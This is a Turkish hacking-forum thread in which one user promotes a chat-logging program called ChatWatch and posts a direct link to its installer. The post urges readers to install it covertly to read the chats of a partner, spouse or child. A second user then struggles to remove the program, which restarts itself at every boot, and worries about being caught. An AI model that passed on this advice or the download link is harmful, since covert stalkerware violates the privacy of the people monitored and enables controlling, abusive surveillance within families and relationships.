evde siz yokken bilgisayarda kim ne yapmıs ögren

ZoRRoKiN

Özel Üye
7 Ağu 2005
2,149
374
WORLD
Siz Yokken Bilgisayarınıza Ne Yaptılar?

CAHTWATCH tüm chat programlarının kaydını tutar.ama bu programı bulunduğunuz makineye kuruyorsunuz.
KARŞI TARAFA YOLLAMIYORSUNUZ BU BİR SERVER DEĞİLDİR
kurun makineye gizlice sevgiliniz,karınız çocuğunuz kimlerle ne halt yiyo o yokken açıp okuyun...bi nevi kendi ailenize kazık atın

TABİ BİDE LİNK VAR
http://www.zemericks.com/software/cw_setup.exe

salebe

Yeni üye
23 Ara 2006
6
0
ya arkadaşlar çldırıcam kurdum şimdi silemk istiyorum ama pc den silinmiyor.acil yardım edin bana.pc yi kapatıyorum tekrar açtığımda otomatik önüme çıkıyor.tamamen yok demedim.bunu nasıl yapabilrim lütfen yardım....

salebe

Yeni üye
23 Ara 2006
6
0
teşekkür ederim bekliyorum*bu gece bunu halletmem lazım yakalanırsam kötü olucak:(

salebe

Yeni üye
23 Ara 2006
6
0
öyle yapıyorum kapanıyor ama pc yi kapatıp açtığımda tekrar direk msn gibi karşıma otomatik açılıyor ben tamamen silek istiyorum pc den.görev yöneticisinden program kaldırmadan her yerden sildim göya ama bir türlü yok olmuyor.napıcam ben şimdi.:(

salebe

Yeni üye
23 Ara 2006
6
0
kardeş ben sizler kadar usta değilim ben bu pc ve net işinde.daha acemiyiz yani.depreez ne?var olduğunu nasıl anlarım vede nasıl yok derim.ayıp olcak biraz ama öğrenmemek daha ayıp...:(kusura bakma benim gibi acemiyle uğraşmakzorunda bıraktım seni sonuç ne olursa olsun kaale aldığın için sağol...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.